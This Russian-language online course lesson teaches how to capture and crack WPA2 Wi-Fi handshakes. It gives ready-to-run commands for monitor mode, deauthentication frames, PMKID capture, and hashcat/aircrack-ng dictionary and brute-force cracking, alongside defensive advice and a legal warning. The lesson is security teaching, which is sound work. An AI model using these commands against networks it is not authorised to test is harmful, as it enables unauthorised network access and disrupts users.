0Pricing
Cyber Security Academy · Урок

Перехват и взлом рукопожатия WPA2

Перехватывайте четырёхэтапное рукопожатие с помощью aircrack-ng и выполняйте словарные атаки с Hashcat.

«Перехват и взлом рукопожатия WPA2» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 2 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.

Четырёхстороннее рукопожатие

Когда клиент подключается к сети WPA2, четырёхстороннее рукопожатие выводит парный временный ключ (PTK) из PMK (полученного из PSK) и случайных одноразовых значений. Перехват этого рукопожатия позволяет автономно подбирать пароль.

Настройка режима монитора

Режим монитора позволяет беспроводной карте перехватывать все кадры независимо от их назначения — это необходимо для пассивного перехвата рукопожатия. Режим работает только с картами, которые его поддерживают.

# Check wireless interface
iwconfig

# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon

# Kill interfering processes first:
sudo airmon-ng check kill

Пассивный перехват рукопожатия

Айродамп-нг пассивно перехватывает кадры. Дождитесь, пока клиент подключится естественным образом, или принудительно инициируйте повторное подключение с помощью деаутентификации. Информация о перехваченном рукопожатии отображается в правом верхнем углу вывода Айродамп-нг.

# Scan for networks
sudo airodump-ng wlan0mon

# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w handshake_capture \
  wlan0mon

# Top right shows: WPA handshake: AA:BB:...

Атака деаутентификацией

Отправка поддельных кадров деаутентификации заставляет подключённых клиентов отключиться и подключиться снова, инициируя новый перехват рукопожатия. Такая атака заметна и обнаруживаема, а клиент должен находиться в зоне действия.

# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
  -a AA:BB:CC:DD:EE:FF \
  -c CC:DD:EE:FF:00:11 \
  wlan0mon

# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)

Атака PMKID: клиент не требуется

Атака PMKID с помощью утилиты хксдамптул извлекает PMKID из маяковых кадров и кадров зондирования, не требуя подключённого клиента. Получить данные можно быстрее, а подобрать их столь же возможно, как и данные полного рукопожатия.

# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
  -o pmkid.pcapng

# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng

# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txt

Взлом рукопожатия с помощью Хэшкэта

Преобразуйте файл перехвата и выполните атаку с помощью режима 22000 Хэшкэта (унифицированный формат WPA2) или режима 2500 (устаревший формат). Для наилучшего результата используйте rockyou.txt вместе с правилами.

# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap

# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt

# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule

# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

Взлом с помощью Эйркрак-нг

Эйркрак-нг выполняет подбор WPA2 с использованием CPU непосредственно по файлу перехвата. Это медленнее, чем подбор на GPU с помощью Хэшкэта, зато преобразование формата не требуется.

# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap

# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.cap

Стратегия использования словарей

Успех подбора пароля WPA2 полностью зависит от качества словаря. Используйте: rockyou.txt как основу, наборы правил Хэшкэта для преобразований, словари, составленные специально для компании (имя+год+символ), и целевые списки, полученные с помощью OSINT.

Реальные сроки взлома

Случайный пароль WPA2 длиной 20 и более символов практически невозможно подобрать вычислительно. Подбор реалистичен только для коротких паролей или паролей на основе словаря. Поэтому длина и случайность пароля важнее правил, требующих сложной комбинации символов.

Защита

Используйте WPA3-SAE, устойчивый к автономной атаке по словарю, либо WPA2 с случайной парольной фразой длиной 20 и более символов, а также WPA2 для корпоративных сетей с EAP-TLS — сертификатами вместо паролей.

Правовое напоминание

Перехват рукопожатий WPA2 в сетях, которыми вы не владеете, незаконен. Все описанные здесь методы применяйте только в собственных тестовых сетях или авторизованных лабораторных средах, например в домашней лаборатории или выделенной тестовой точке доступа.

Быстрая проверка

Что улучшает атака PMKID по сравнению со стандартным перехватом рукопожатия?

Сводка: взлом WPA2

Перехват рукопожатия WPA2 или PMKID превращает взлом Wi-Fi в автономную атаку по словарю. Успех полностью зависит от надёжности пароля: короткие пароли и пароли на основе словаря быстро подбираются, а длинные случайные пароли практически невозможно взломать. Защищайтесь с помощью WPA3-SAE, надёжных парольных фраз и WPA2 для корпоративных сетей.

Часто задаваемые вопросы

Урок «Перехват и взлом рукопожатия WPA2» бесплатный?

Да — полный текст урока «Перехват и взлом рукопожатия WPA2» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.

Чему я научусь в уроке «Перехват и взлом рукопожатия WPA2»?

Перехватывайте четырёхэтапное рукопожатие с помощью aircrack-ng и выполняйте словарные атаки с Hashcat. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.

Нужен ли мне опыт, чтобы начать Cyber Security Academy?

Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 2 из 4.

Сколько времени занимает урок «Перехват и взлом рукопожатия WPA2»?

Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.

Можно ли писать и запускать код в этом уроке Cyber Security Academy?

Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.

Все уроки этого курса

  1. Протоколы безопасности 802.11: WEP, WPA2, WPA3
  2. Перехват и взлом рукопожатия WPA2
  3. Атаки Evil Twin и поддельного портала авторизации
  4. Корпоративный Wi-Fi: EAP и RADIUS
← Назад к Cyber Security Academy